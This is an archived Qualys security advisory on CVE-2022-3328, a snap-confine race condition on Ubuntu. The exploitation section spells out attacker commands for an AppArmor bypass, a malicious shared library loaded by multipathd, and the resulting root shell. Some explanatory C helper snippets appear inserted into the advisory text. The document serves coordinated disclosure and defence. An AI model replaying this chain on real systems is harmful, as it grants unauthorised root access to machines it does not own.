    CVE-2022-3328: Snapd Race condition in snap-confine

    ⚠️ [ ORIGIN SOURCE ]
    https://blog.qualys.com/vulnerabilities-threat-research/2022/11/30/race-condition-in-snap-confines-must_mkdir_and_open_with_perms-cve-2022-3328
    📅 [ Archival Date ]
    Dec 9, 2022 1:43 PM
    🏷️ [ Tags ]
    Snapd, Ubuntu
    ✍️ [ Author ]

    Saeed Abbasi

    The Qualys Threat Research Unit (TRU) has discovered a new vulnerability in snap-confine, a SUID-root program installed by default on Ubuntu. Qualys recommends that security teams apply the patch for this vulnerability as soon as possible.

    In February 2022, the Qualys Threat Research Unit (TRU) published CVE-2021-44731 in our “Lemmings” advisory. The new vulnerability (CVE-2022-3328) was introduced in February 2022 by the patch for CVE-2021-44731.

    The Qualys Threat Research Unit (TRU) exploited this bug in Ubuntu Server by combining it with two vulnerabilities in multipathd, collectively called Leeloo Multipath (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973), to obtain full root privileges.

    What is snap-confine?

    The snap-confine program is an internal tool that snapd uses to construct the confined execution environment for snap applications.

    Potential Impact

    Successful exploitation of the three vulnerabilities lets any unprivileged user gain root privileges on the vulnerable device. Qualys security researchers have verified the vulnerability, developed an exploit and obtained full root privileges on default installations of Ubuntu.

    As soon as the Qualys Threat Research Unit confirmed the vulnerability, we engaged in responsible vulnerability disclosure and coordinated with vendors and open-source distributions to announce this newly discovered vulnerability.

    The technical details

    Disclosure Timeline

    • 2022-08-23: Contacted security@ubuntu
    • 2022-11-28: Contacted linux-distros@openwall
    • 2022-11-30: Coordinated Release Date (17:00 UTC)
    Qualys Security Advisory
    
    Race condition in snap-confine's must_mkdir_and_open_with_perms()
    (CVE-2022-3328)
    
    
    ========================================================================
    Contents
    ========================================================================
    
    Summary
    Background
    Exploitation
    Acknowledgments
    Timeline
    
        I can't help but feel a missed opportunity to integrate lyrics from
        one of the best songs ever: [SNAP! - The Power (Official Video)]
            -- https://twitter.com/spendergrsec/status/1494420041076461570
    
    
    ========================================================================
    Summary
    ========================================================================
    
    We discovered a race condition (CVE-2022-3328) in snap-confine, a
    SUID-root program installed by default on Ubuntu. In this advisory, we
    tell the story of this vulnerability (which was introduced in February
    2022 by the patch for CVE-2021-44731) and detail how we exploited it in
    Ubuntu Server (a local privilege escalation, from any user to root) by
    combining it with two vulnerabilities in multipathd (an authorization
    bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):
    
    https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt
    
    
    ========================================================================
    Background
    ========================================================================
    
        Like the crack of the whip, I Snap! attack
        Radical mind, day and night all the time
            -- SNAP! - The Power
    
    In February 2022, we published CVE-2021-44731 in our "Lemmings" advisory
    (https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):
    to set up a snap's sandbox, snap-confine created the temporary directory
    /tmp/snap.$SNAP_NAME or reused it if it already existed, even if it did
    not belong to root; a local attacker could race against snap-confine,
    retain control over /tmp/snap.$SNAP_NAME, and eventually obtain full
    root privileges.
    
    This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:
    Prevent user-controlled race in setup_private_mount"), which introduced
    a new helper function, must_mkdir_and_open_with_perms():
    
    ------------------------------------------------------------------------
    142 static void setup_private_mount(const char *snap_name)
    ...
    169         sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);
    ...
    176         base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);
    ------------------------------------------------------------------------
     55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid,
     56                                           mode_t mode)
     ..
     61  mkdir:
     ..
     67         if (mkdir(dir, 0700) < 0 && errno != EEXIST) {
     ..
     70         fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW);
     ..
     81         if (fstat(fd, &st) < 0) {
     ..
     84         if (st.st_uid != uid || st.st_gid != gid
     85             || st.st_mode != (S_IFDIR | mode)) {
    ...
    130                 if (rename(dir, random_dir) < 0) {
    ...
    135                 goto mkdir;
    ------------------------------------------------------------------------
    
    - the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if
      it does not exist already;
    
    - if it already exists, and if it does not belong to root (at line 84),
      then it is moved out of the way (at line 130) by rename()ing it to a
      random directory in /tmp, and its creation is retried (at line 135).
    
    When we reviewed this patch back in December 2021, we felt very nervous
    about this rename() call (because it allows a local attacker to rename()
    a directory they do not own), and we advised the Ubuntu Security Team to
    either not reuse the directory /tmp/snap.$SNAP_NAME at all, or to create
    it in a non-world-writable directory instead of /tmp, or at least to use
    renameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all of
    these ideas were deemed impractical (for example, renameat2() is not
    supported by older kernel and glibc versions); moreover, we (Qualys)
    failed to come up with a feasible attack plan against this rename()
    call, so the patch was kept in its current form.
    
    After the release of Ubuntu 22.04 in April 2022, we decided to revisit
    snap-confine and its recent hardening changes, and we finally found a
    way to exploit the rename() call in must_mkdir_and_open_with_perms().
    
    
    ========================================================================
    Exploitation
    ========================================================================
    
        It's getting, it's getting, it's getting kinda heavy
        It's getting, it's getting, it's getting kinda hectic
            -- SNAP! - The Power
    
    The three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:
    
    1/ snap-confine operates in /tmp to create a snap's temporary directory
    (/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in
    /tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX in
    sc_bootstrap_mount_namespace(), where all of the Xs are randomized by
    mkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snap
    instance name by sc_instance_name_validate() (when all of the Xs are
    lowercase alphanumeric):
    
    ------------------------------------------------------------------------
    286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)
    ...
    288         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";
    ...
    291         if (mkdtemp(scratch_dir) == NULL) {
    ...
    303         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);
    ...
    319         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,
    ...
    331         for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;
    ...
    342                 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,
    343                                  mnt->path);
    ...
    352                         sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,
    ------------------------------------------------------------------------
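
The condition in idea 1/ (a name of the form rootfs_XXXXXX is accepted
only when every X is lowercase alphanumeric) can be illustrated with a
small check. This is a simplified approximation and NOT snapd's
sc_instance_name_validate(): the function names and the length limits
(40 for the name, 10 for the key) are assumptions made for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

static bool is_lower_alnum(char c)
{
        return (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9');
}

/* Simplified approximation (assumed rules, not snapd's validator):
 * accepts "<name>" or "<name>_<key>", where <name> is 1-40 characters
 * of [a-z0-9-] and <key> is 1-10 characters of [a-z0-9]. */
static bool looks_like_instance_name(const char *s)
{
        assert(s != NULL);

        const char *sep = strchr(s, '_');
        size_t name_len = sep ? (size_t)(sep - s) : strlen(s);

        if (name_len == 0 || name_len > 40)
                return false;
        for (size_t i = 0; i < name_len; i++)
                if (!is_lower_alnum(s[i]) && s[i] != '-')
                        return false;

        if (sep == NULL)
                return true;    /* no instance key present */

        size_t key_len = strlen(sep + 1);
        if (key_len == 0 || key_len > 10)
                return false;
        for (size_t i = 0; i < key_len; i++)
                if (!is_lower_alnum(sep[1 + i]))
                        return false;
        return true;
}
```

Under these assumed rules, a suffix that contains any uppercase
character is rejected, so only some of the names that mkdtemp() can
generate would pass as instance names.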
    
    2/ We therefore execute two instances of snap-confine in parallel:
    
    - we block the first snap-confine immediately after it creates its root
      directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this
      race condition by "single-stepping" snap-confine, as explained in our
      "Lemmings" advisory);
    
    - we execute the second snap-confine with a snap instance name of
      rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of
      this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX
      of the first snap-confine;
    
    - we kill this second snap-confine immediately after it rename()s its
      temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory
      /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we
      reliably win this race condition with inotify, as explained in our
      "Lemmings" advisory);
    
    - we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and
      resume the execution of the first snap-confine, whose root directory
      now belongs to us.
    
    3/ We can therefore create an arbitrary symlink
    /tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() will
    bind-mount the real /tmp directory (which is world-writable) onto any
    directory in the filesystem (because mount() will follow our arbitrary
    symlink at line 352).
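
To make the hazard in idea 3/ concrete: the destination at lines 342-343
is a plain string concatenation, so nothing in that step distinguishes a
real directory from a symlink. The sketch below is a hypothetical
diagnostic helper (dst_is_symlink() does not exist in snapd) that builds
the path the same way and inspects it with lstat(). It is illustrative
only; a check like this is itself subject to a race between the check
and the later mount(), so it should not be read as a proposed fix.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/stat.h>

/* Hypothetical helper: builds "<scratch_dir>/<rel_path>" the way the
 * excerpt does at lines 342-343 and reports whether the final path
 * component is a symbolic link.
 * Returns 1 for a symlink, 0 for anything else, -1 on error. */
static int dst_is_symlink(const char *scratch_dir, const char *rel_path)
{
        char dst[4096];
        struct stat st;

        assert(scratch_dir != NULL && rel_path != NULL);

        int n = snprintf(dst, sizeof dst, "%s/%s", scratch_dir, rel_path);
        if (n < 0 || (size_t)n >= sizeof dst)
                return -1;      /* formatting error or truncated path */

        /* lstat() examines the link itself instead of following it. */
        if (lstat(dst, &st) < 0)
                return -1;

        return S_ISLNK(st.st_mode) ? 1 : 0;
}
```

For example, on a typical Linux system dst_is_symlink("/proc", "self")
reports a symlink, whereas a path-based mount() call would resolve the
link and operate on its target.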
    
    This ability will eventually allow us to obtain full root privileges,
    but we must first solve three problems:
    
    ------------------------------------------------------------------------
    Problem a/ We cannot trick snap-confine into rename()ing
    /tmp/snap.rootfs_XXXXXX, because this directory belongs to root and
    must_mkdir_and_open_with_perms() rename()s it only if it does not belong
    to root!
    
    This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXX
    belongs to the user root, but it belongs to the group of our own user,
    so must_mkdir_and_open_with_perms() rename()s it because it does not
    belong to the group root (at line 84).
    
    ------------------------------------------------------------------------
    Problem b/ We cannot trick snap-confine into following our symlink
    /tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()
    bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line
    319): if we create our symlink before this bind-mount, then it becomes
    covered by the squashfs; and we cannot create our symlink after this
    bind-mount, because the squashfs is read-only and belongs to root!
    
    The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"
    of our "Lemmings" advisory suggests a solution to this problem: we must
    unmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()
    bind-mounts it (at lines 303 and 319). The "(deleted)" technique we used
    in "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,
    but we found a surprisingly simple workaround:
    
    we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediately
    after we re-create this directory ourselves; this allows us to unmount
    (with fusermount -u -z) any subsequent bind-mounts (even if they belong
    to root), because fusermount does not check that our FUSE filesystem is
    indeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.
    
    ------------------------------------------------------------------------
    Problem c/ We cannot trick snap-confine into bind-mounting the real /tmp
    onto an arbitrary directory in the filesystem (at line 352), because
    such a bind-mount is forbidden by snap-confine's AppArmor profile!
    
    To solve this problem, we must bypass AppArmor completely, but the
    technique we used in our "Lemmings" advisory (we wrapped snap-confine's
    execution in an AppArmor profile that was in "complain" mode, not in
    "enforce" mode) was patched in February 2022 (by commits 26eed65 and
    4a2eb78, "ensure that snap-confine is in strict confinement" and
    "Tighten AppArmor label check"):
    
    now, snap-confine's execution must be wrapped in an AppArmor profile
    that is in "enforce" mode and whose label matches the regular expression
    "^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".
    
    We were about to give up on trying to exploit snap-confine, when we
    discovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which is
    installed by default on Ubuntu Server): these two vulnerabilities allow
    us to create a directory named "failed_wwids" (user root, group root,
    mode 0700) anywhere in the filesystem, and we were able to transform
    this very limited directory creation into a complete AppArmor bypass.
    
    AppArmor supports policy namespaces that are loosely related to kernel
    user namespaces; by default, no AppArmor namespaces exist:
    
    ------------------------------------------------------------------------
    $ ls -la /sys/kernel/security/apparmor/policy/namespaces
    total 0
    drwxr-xr-x 2 root root 0 Aug  6 12:42 .
    drwxr-xr-x 5 root root 0 Aug  6 12:42 ..
    ------------------------------------------------------------------------
    
    However, we (attackers) can create an AppArmor namespace "failed_wwids"
    by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:
    
    ------------------------------------------------------------------------
    $ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath
    
    $ multipathd list devices | grep 'whitelisted, unmonitored'
        sda1 devnode whitelisted, unmonitored
        ...
    
    $ multipathd list list path sda1
    fail
    
    $ ls -la /sys/kernel/security/apparmor/policy/namespaces
    total 0
    drwxr-xr-x 3 root root 0 Aug  6 12:42 .
    drwxr-xr-x 5 root root 0 Aug  6 12:42 ..
    drwx------ 5 root root 0 Aug  6 13:38 failed_wwids
    ------------------------------------------------------------------------
    
    Then, we can enter this AppArmor namespace by creating and entering an
    unprivileged user namespace:
    
    ------------------------------------------------------------------------
    $ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh
    ------------------------------------------------------------------------
    
    Inside this namespace, we can create an AppArmor profile labeled
    "/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows all
    possible operations:
    
    ------------------------------------------------------------------------
    # apparmor_parser -K -a << "EOF"
    /usr/lib/snapd/snap-confine (enforce) {
    capability,
    network,
    mount,
    remount,
    umount,
    pivot_root,
    ptrace,
    signal,
    dbus,
    unix,
    file,
    change_profile,
    }
    EOF
    ------------------------------------------------------------------------
    
    Back in the initial namespace, we check that our "allow all" AppArmor
    profile still exists:
    
    ------------------------------------------------------------------------
    # aa-status
    apparmor module is loaded.
    32 profiles are loaded.
    32 profiles are in enforce mode.
       ...
       :failed_wwids:/usr/lib/snapd/snap-confine
    ------------------------------------------------------------------------
    
    Last, we make sure that snap-confine accepts our "allow all" AppArmor
    profile (i.e., AppArmor is bypassed, and snap-confine is effectively
    unconfined):
    
    ------------------------------------------------------------------------
    $ env -i SNAPD_DEBUG=1 SNAP_INSTANCE_NAME=lxd aa-exec -n failed_wwids -p /usr/lib/snapd/snap-confine -- /usr/lib/snapd/snap-confine --base lxd snap.lxd.daemon /nonexistent
    ...
    DEBUG: apparmor label on snap-confine is: /usr/lib/snapd/snap-confine
    DEBUG: apparmor mode is: enforce
    ------------------------------------------------------------------------
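
The label shown in the debug output can be checked against the regular
expression quoted under Problem c/. The following is a minimal sketch
using POSIX regcomp()/regexec(); the function name label_is_accepted()
is hypothetical, and the advisory does not show how snap-confine itself
performs the match, so this only exercises the pattern.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <regex.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical helper: returns true when the given AppArmor label
 * matches the pattern quoted in the advisory. */
static bool label_is_accepted(const char *label)
{
        static const char pattern[] =
            "^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)"
            "/snapd/snap-confine$";
        regex_t re;

        assert(label != NULL);

        /* REG_EXTENDED: the pattern uses (), |, ? and + as operators. */
        if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
                return false;

        bool ok = regexec(&re, label, 0, NULL, 0) == 0;
        regfree(&re);
        return ok;
}
```

The pattern constrains only the label text. The label printed above,
/usr/lib/snapd/snap-confine, matches it even though the profile was
loaded inside the failed_wwids namespace.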
    
    We can therefore bind-mount /tmp onto an arbitrary directory in the
    filesystem (by exploiting CVE-2022-3328); since we already depend on
    multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,
    create our own shared library /lib/multipath/libchecktur.so, shut down
    multipathd (by exploiting CVE-2022-41974), restart multipathd (through
    its Unix socket), and finally obtain full root privileges (because
    multipathd executes our shared library as root when it restarts):
    
    ------------------------------------------------------------------------
    $ grep multipath /proc/self/mountinfo | wc
          0       0       0
    
    $ gcc -o CVE-2022-3328 CVE-2022-3328.c
    $ ./CVE-2022-3328
    scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c
    
    $ grep multipath /proc/self/mountinfo
    1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
    ...
    
    $ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c
    
    $ ps -ef | grep 'multipath[d]'
    root         371       1  0 12:42 ?        00:00:00 /sbin/multipathd -d -s
    
    $ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit
    ok
    
    $ ps -ef | grep 'multipath[d]' | wc
          0       0       0
    
    $ ls -l /tmp/sh
    ls: cannot access '/tmp/sh': No such file or directory
    
    $ multipathd list daemon
    error -104 receiving packet
    
    $ ls -l /tmp/sh
    -rwsr-xr-x 1 root root 125688 Aug  6 14:55 /tmp/sh
    
    $ /tmp/sh -p
    # id
    uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
                                         ^^^^^^^^^^^^
    ------------------------------------------------------------------------
    
    
    ========================================================================
    Acknowledgments
    ========================================================================
    
    We thank the Ubuntu security team (Alex Murray and Seth Arnold in
    particular) and the snapd team for their hard work on this snap-confine
    vulnerability. We also thank the members of linux-distros@openwall.